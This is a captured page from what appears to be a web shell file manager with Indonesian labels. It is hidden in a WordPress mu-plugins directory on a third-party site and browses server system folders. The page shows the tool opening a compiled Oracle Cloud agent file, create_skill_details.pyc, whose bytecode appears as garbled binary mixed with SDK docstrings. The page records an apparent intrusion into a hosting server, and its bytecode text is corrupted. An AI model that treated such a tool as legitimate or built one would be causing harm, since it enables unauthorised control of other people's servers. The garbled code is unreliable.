📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/shelleycutler.com/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
libexec
›
oracle-cloud-agent
›
plugins
›
osms
›
oci
›
oda
›
📁 models
📍
Lokasi:
/usr/libexec/oracle-cloud-agent/plugins/osms/oci/oda/models
💾
Free:
45.6 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: create_skill_details.pyc
a O��f�. � @ s8 d dl mZmZmZ d dlmZ eG dd� de��ZdS )� )�formatted_flat_dict� NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc @ s$ e Zd ZdZdZdZdZdZdZdZ dd � Z ed d� �Ze dd � �Zejdd � �Ze dd� �Zejdd� �Ze dd� �Zejdd� �Ze dd� �Zejdd� �Ze dd� �Zejdd� �Ze dd� �Zejdd� �Ze dd� �Zejd d� �Ze d!d"� �Zejd#d"� �Zd$d%� Zd&d'� Zd(d)� Zd*S )+�CreateSkillDetailsz9 Properties that are required to create a Skill. �NEW�CLONE�VERSION�EXTEND�NATIVE�TRANSLATIONc K sd ddddddddd�| _ ddddd d ddd�| _d | _d | _d | _d | _d | _d | _d | _d | _ d S )a� Initializes a new CreateSkillDetails object with values from keyword arguments. This class has the following subclasses and if you are using this class as input to a service operations then you should favor using a subclass over the base class: * :class:`~oci.oda.models.CloneSkillDetails` * :class:`~oci.oda.models.CreateNewSkillDetails` * :class:`~oci.oda.models.CreateSkillVersionDetails` * :class:`~oci.oda.models.ExtendSkillDetails` The following keyword arguments are supported (corresponding to the getters/setters of this class): :param kind: The value to assign to the kind property of this CreateSkillDetails. Allowed values for this property are: "NEW", "CLONE", "VERSION", "EXTEND" :type kind: str :param category: The value to assign to the category property of this CreateSkillDetails. :type category: str :param description: The value to assign to the description property of this CreateSkillDetails. :type description: str :param platform_version: The value to assign to the platform_version property of this CreateSkillDetails. :type platform_version: str :param multilingual_mode: The value to assign to the multilingual_mode property of this CreateSkillDetails. Allowed values for this property are: "NATIVE", "TRANSLATION" :type multilingual_mode: str :param primary_language_tag: The value to assign to the primary_language_tag property of this CreateSkillDetails. :type primary_language_tag: str :param freeform_tags: The value to assign to the freeform_tags property of this CreateSkillDetails. :type freeform_tags: dict(str, str) :param defined_tags: The value to assign to the defined_tags property of this CreateSkillDetails. :type defined_tags: dict(str, dict(str, object)) �strzdict(str, str)zdict(str, dict(str, object)))�kind�category�description�platform_version�multilingual_mode�primary_language_tag� freeform_tags�defined_tagsr r r �platformVersion�multilingualMode�primaryLanguageTag�freeformTags�definedTagsN) � swagger_types� attribute_map�_kind� _category�_description�_platform_version�_multilingual_mode�_primary_language_tag�_freeform_tags� _defined_tags)�self�kwargs� r'